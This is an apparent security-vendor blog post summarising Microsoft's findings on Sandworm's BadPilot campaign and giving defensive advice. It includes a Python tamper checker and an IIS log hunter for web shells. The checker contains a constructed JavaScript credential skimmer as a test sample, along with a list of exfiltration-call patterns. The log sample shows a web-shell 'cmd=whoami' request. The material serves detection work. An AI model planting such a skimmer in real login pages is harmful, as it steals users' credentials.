
Understanding Sandworm: Cyber Attacks Beyond Borders

Microsoft has identified a sophisticated cyber espionage operation carried out by a subgroup within Sandworm, the Russian state-sponsored hacking collective that Microsoft tracks as Seashell Blizzard. The operation, codenamed BadPilot, has been active since at least 2021, targeting internet-facing infrastructure in over 15 countries. This marks a significant expansion beyond Sandworm’s previous focus on Eastern Europe, with intrusions now observed in North America, South America, Asia, and Africa.


Sandworm’s Expanding Reach

While Sandworm has historically concentrated on Ukraine, its latest activities indicate a shift in strategy. Microsoft’s findings reveal that high-value targets include government agencies, energy and telecommunications providers, arms manufacturers, and logistics firms. Countries affected by this operation include the United States, Canada, the United Kingdom, Australia, India, China, Turkey, Argentina, and Nigeria.

The scale of this campaign suggests that Russia is investing heavily in broadening its cyber capabilities, ensuring access to strategic infrastructure across multiple regions. Sandworm’s subgroup appears to be pursuing both opportunistic mass compromises and targeted intrusions, indicating a desire to maintain persistent access across various industries.


Exploiting Vulnerabilities for Initial Access

To gain a foothold in target environments, the subgroup exploits publicly known vulnerabilities in widely deployed, internet-facing software. Microsoft has identified multiple flaws actively leveraged in these attacks, including vulnerabilities in Microsoft Exchange Server, Fortinet FortiClient EMS, Zimbra Collaboration, and JetBrains TeamCity. None of these were zero-days: each was publicly disclosed and patched by the vendor before Sandworm used it, so the exposure came from patch latency on edge systems rather than from novel attacker tradecraft.

By taking advantage of unpatched systems, Sandworm secures initial access to corporate and government networks, allowing it to establish long-term persistence. From there, the attackers deploy tools for credential harvesting, privilege escalation, and lateral movement within compromised organizations.


Maintaining Persistence and Avoiding Detection

Once inside a network, the attackers use several tactics to ensure prolonged access. Microsoft has observed the group deploying legitimate remote monitoring and management (RMM) tools, such as Atera Agent and Splashtop Remote Services, which let it blend in with ordinary IT administration and survive malware cleanup because nothing on disk is recognisably malicious. The group has also been seen installing OpenSSH with attacker-controlled keys, and a utility Microsoft calls ShadowLink, which registers the compromised host as a Tor hidden service so that it can be reached covertly over the Tor network. Because the host initiates the outbound Tor connection itself, firewall rules that block inbound traffic do not stop it; spotting it means looking for unexpected Tor binaries and outbound Tor traffic on servers.

Another method involves modifying Outlook Web Access (OWA) sign-in pages to inject JavaScript that captures credentials as users type them and exfiltrates them in near real time. Because every subsequent login is captured, including logins made with freshly reset passwords, the attackers can regain access after security teams rotate credentials, unless the tampered page itself is found and restored.
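The two checks a defender would run against that tampering, as an added example written for this article (not Microsoft's or Netizen's code): a SHA-256 baseline comparison of the on-disk sign-in page, and a heuristic scan of inline scripts for the skimmer pattern (a script that touches the username/password fields and also sends data somewhere). The form field names and the allowed script path prefix are assumptions based on the standard OWA logon form, and both sample pages are constructed for the example.

```python
import hashlib
from html.parser import HTMLParser

# Form field names/ids on the OWA logon page (assumption, standard form).
CREDENTIAL_FIELDS = ("username", "password", "passwordText")
# JavaScript calls that move data off the page.
EXFIL_CALLS = ("XMLHttpRequest", "fetch(", "sendBeacon", "new Image(", ".src=", "WebSocket(")
# Prefix under which OWA's own scripts are served (assumption).
ALLOWED_SCRIPT_PREFIXES = ("/owa/",)


class _ScriptCollector(HTMLParser):
    """Collect inline <script> bodies and external script src values."""

    def __init__(self):
        super().__init__()
        self._in_inline = False
        self.inline_scripts = []
        self.external_scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external_scripts.append(src)
        else:
            self._in_inline = True
            self.inline_scripts.append("")

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_inline = False

    def handle_data(self, data):
        if self._in_inline:
            self.inline_scripts[-1] += data


def sha256_hex(content: bytes) -> str:
    return hashlib.sha256(content).hexdigest()


def find_suspicious_scripts(html: str):
    """Heuristic scan of one page; returns (kind, detail) tuples."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for body in parser.inline_scripts:
        touches_creds = any(f in body for f in CREDENTIAL_FIELDS)
        sends_data = any(c in body for c in EXFIL_CALLS)
        if touches_creds and sends_data:
            findings.append(("inline_credential_exfil", " ".join(body.split())[:80]))
    for src in parser.external_scripts:
        if not src.startswith(ALLOWED_SCRIPT_PREFIXES):
            findings.append(("unexpected_external_script", src))
    return findings


def check_page(name: str, content: bytes, baseline: dict):
    """Baseline hash comparison plus heuristic scan for one page file."""
    findings = []
    expected = baseline.get(name)
    if expected is None:
        findings.append(("no_baseline", name))
    elif expected != sha256_hex(content):
        findings.append(("hash_mismatch", name))
    findings.extend(find_suspicious_scripts(content.decode("utf-8", "replace")))
    return findings


# Constructed sample: a simplified OWA logon form.
CLEAN_PAGE = b"""<html><body>
<form action="/owa/auth.owa" method="POST" name="logonForm">
<input id="username" name="username" type="text">
<input id="passwordText" name="password" type="password">
<input type="submit" value="sign in">
</form>
<script src="/owa/auth/logon.js"></script>
</body></html>"""

# Constructed sample: the same page with a skimmer injected. It posts to a path
# on the same server (collectable through a web shell), so an allowlist on the
# script URL alone would not catch it; the content heuristic does.
TAMPERED_PAGE = CLEAN_PAGE.replace(b"</body>", b"""<script>
document.logonForm.onsubmit = function () {
  var u = document.getElementById("username").value;
  var p = document.getElementById("passwordText").value;
  var x = new XMLHttpRequest();
  x.open("POST", "/owa/auth/current/themes/resources/theme.css", true);
  x.send(u + ":" + p);
};
</script>
</body>""")

# In production the baseline is recorded at deploy time and stored off-host.
BASELINE = {"logon.aspx": sha256_hex(CLEAN_PAGE)}

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("tampered", TAMPERED_PAGE)):
        print(label, check_page("logon.aspx", page, BASELINE))
```

The hash check is the authoritative one and should run against every file under the OWA auth directory, not just logon.aspx; the heuristic exists so that a page with no baseline (or a baseline taken after the compromise) still gets a second opinion. Keep the baseline off the Exchange server, since an attacker with a web shell on the box can rewrite it.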

The use of web shells is another persistence tactic. The group has deployed a custom web shell Microsoft calls LocalOlive, which serves as a hidden entry point on the compromised server for follow-on payloads, such as tunneling utilities and malware designed for deeper network penetration.
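A web shell on an Exchange server leaves a characteristic trace in the IIS logs, and hunting for it needs no signature for the shell itself. The following is an added example for this article (not Microsoft's or Netizen's code): it parses IIS W3C logs and flags POST requests to server-side script files outside the small set of endpoints Exchange legitimately serves POSTs on, then strengthens the lead when a path is hit only by one or two client IPs with a non-browser User-Agent. The endpoint allowlist is an assumption to be tuned per environment, and the log lines are constructed for the example.

```python
from collections import defaultdict
from urllib.parse import unquote

# Exchange endpoints that legitimately receive POSTs (illustrative allowlist;
# tune it to what your own servers actually serve).
KNOWN_POST_ENDPOINTS = {
    "/owa/auth.owa", "/owa/service.svc", "/ews/exchange.asmx",
    "/autodiscover/autodiscover.xml", "/mapi/emsmdb", "/mapi/nspi",
    "/ecp/default.aspx", "/microsoft-server-activesync",
}
# Server-side script types a web shell on IIS would be written as.
SCRIPT_SUFFIXES = (".aspx", ".ashx", ".asmx", ".svc")


def parse_iis_w3c(lines):
    """Yield one dict per request, naming columns from the #Fields directive."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # truncated or malformed record: skip rather than misalign
        yield dict(zip(fields, parts))


def hunt_webshells(lines):
    """Return {path: summary} for script paths receiving POSTs outside the allowlist."""
    per_path = defaultdict(lambda: {"posts": 0, "clients": set(), "agents": set(), "queries": set()})
    for r in parse_iis_w3c(lines):
        path = unquote(r.get("cs-uri-stem", "-")).lower()
        if r.get("cs-method") != "POST" or not path.endswith(SCRIPT_SUFFIXES):
            continue
        if path in KNOWN_POST_ENDPOINTS:
            continue
        s = per_path[path]
        s["posts"] += 1
        s["clients"].add(r.get("c-ip", "-"))
        s["agents"].add(r.get("cs(User-Agent)", "-"))
        query = r.get("cs-uri-query", "-")
        if query != "-":
            s["queries"].add(unquote(query))
    findings = {}
    for path, s in per_path.items():
        reasons = ["post_to_unlisted_script"]
        if len(s["clients"]) <= 2:
            reasons.append("few_source_ips")          # used by its operator, not the user base
        if not any(a.startswith("Mozilla") for a in s["agents"]):
            reasons.append("non_browser_user_agent")  # scripted access
        findings[path] = {
            "posts": s["posts"],
            "clients": sorted(s["clients"]),
            "queries": sorted(s["queries"]),
            "reasons": reasons,
        }
    return findings


# Constructed sample log (IIS encodes spaces inside fields as '+').
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-02-10 09:12:01 10.0.0.5 GET /owa/auth/logon.aspx replaceCurrent=1 443 - 10.0.1.7 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 31
2025-02-10 09:12:09 10.0.0.5 POST /owa/auth.owa - 443 - 10.0.1.7 Mozilla/5.0+(Windows+NT+10.0) https://mail.example.test/owa/auth/logon.aspx 302 0 0 15
2025-02-10 09:13:00 10.0.0.5 POST /EWS/Exchange.asmx - 443 CORP\\jdoe 10.0.1.7 Microsoft+Office/16.0 - 200 0 0 44
2025-02-10 09:20:10 10.0.0.5 POST /owa/auth/Current/themes/resources/update.aspx - 443 - 203.0.113.9 python-requests/2.31 - 200 0 0 120
2025-02-10 09:20:12 10.0.0.5 POST /owa/auth/Current/themes/resources/update.aspx cmd=whoami 443 - 203.0.113.9 python-requests/2.31 - 200 0 0 95
""".splitlines()

if __name__ == "__main__":
    for path, summary in hunt_webshells(SAMPLE_LOG).items():
        print(path, summary)
```

Pair a hit with file-system evidence: the flagged path should correspond to a file whose creation time post-dates the last legitimate deployment, and whose content is not in the Exchange install media. Status code is deliberately not used as a filter, since a working shell returns 200 just like a real page.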


Cybercrime as a State-Sponsored Tool

One of the most concerning aspects of Sandworm’s operations is its increasing reliance on cybercriminal tooling and infrastructure. Microsoft and Google’s Threat Intelligence Group have reported that the group purchases access to already-compromised systems through underground forums and uses malware originally built for and sold to cybercriminals.

By leveraging commodity malware such as DarkCrystal RAT (DCRat), Warzone, and Rhadamanthys Stealer, Sandworm can scale its operations quickly without relying solely on in-house tooling, and its intrusions look like ordinary crimeware to anyone triaging alerts. The group also uses bulletproof hosting from known cybercriminal providers, which ignore abuse reports and takedown requests, complicating both attribution and disruption of the infrastructure.


Trojanized Software and Fake Windows Updates

Recent research from the cybersecurity firms EclecticIQ and Mandiant has revealed that Sandworm is also using trojanized software activators (pirated Windows KMS activation tools) and fake Windows updates to spread malware. These lures are particularly effective in regions like Ukraine, where the use of pirated software is widespread and users expect an activator to ask for administrative rights.

One example is the Kalambur backdoor, which masquerades as a legitimate Windows security update. Once installed, it enables remote access over the Remote Desktop Protocol (RDP) and routes the connections through Tor, so the operator’s sessions arrive from the Tor network rather than from an attributable IP address.

This approach complements Sandworm’s established focus on industrial control systems (ICS) and critical infrastructure: malware embedded in widely used applications can reach systems that are never directly exposed to the internet. By exploiting organizations’ reliance on unlicensed or untrusted software, the group gets the victim to install the implant themselves, sidestepping the need for an exploitable vulnerability altogether.


The Bigger Picture: A Shifting Cyber Warfare Landscape

Microsoft’s report highlights the evolving nature of Russian cyber operations. Sandworm’s shift from regionally focused attacks to a global cyber espionage campaign reflects broader geopolitical ambitions. The group’s ability to combine state-backed hacking with cybercriminal tactics makes it an increasingly dangerous threat.

With access to a growing number of compromised networks, Sandworm is positioned to conduct espionage, disrupt critical industries, and establish long-term footholds in strategic sectors. These activities are likely aligned with the Kremlin’s long-term geopolitical objectives, giving Russia the ability to engage in cyber warfare on a massive scale.


How Organizations Can Defend Against Sandworm Attacks

To mitigate the risk posed by Sandworm and similar state-sponsored threats, organizations must adopt a proactive cybersecurity strategy. Keeping internet-facing software up to date is critical, because the group relies on known vulnerabilities: the Exchange, Fortinet, Zimbra, and TeamCity flaws used in this campaign all had vendor patches available before they were exploited. Edge systems (mail, VPN, and CI/CD servers) deserve the shortest patch window, along with an inventory check that nothing reachable from the internet has been forgotten. Network segmentation limits an attacker’s ability to move laterally after a foothold, reducing the impact of a successful breach.

Security teams should also invest in endpoint detection and response (EDR) to monitor suspicious activity in real time, and should specifically alert on the persistence tradecraft described above: remote management agents such as Atera or Splashtop appearing on hosts where IT never installed them, OpenSSH or Tor binaries on Windows servers, new SSH authorized keys, and unexpected changes to OWA sign-in pages or new script files under web server directories. A zero-trust security model, which continuously verifies users and devices before granting access and treats stolen credentials as an expected event rather than a surprise, helps contain unauthorized lateral movement.

Given the increasing sophistication of cyber threats, threat intelligence monitoring is essential. Organizations must stay informed about the latest APT tactics and adjust their defenses accordingly. As cyber warfare continues to evolve, maintaining a strong security posture will be crucial in defending against nation-state actors.


How Can Netizen Help?

Netizen ensures that security is built in, not bolted on, providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service”, wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.

We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

Questions or concerns? Feel free to reach out to us any time –

https://www.netizen.net/contact


Copyright © Netizen Corporation. All Rights Reserved.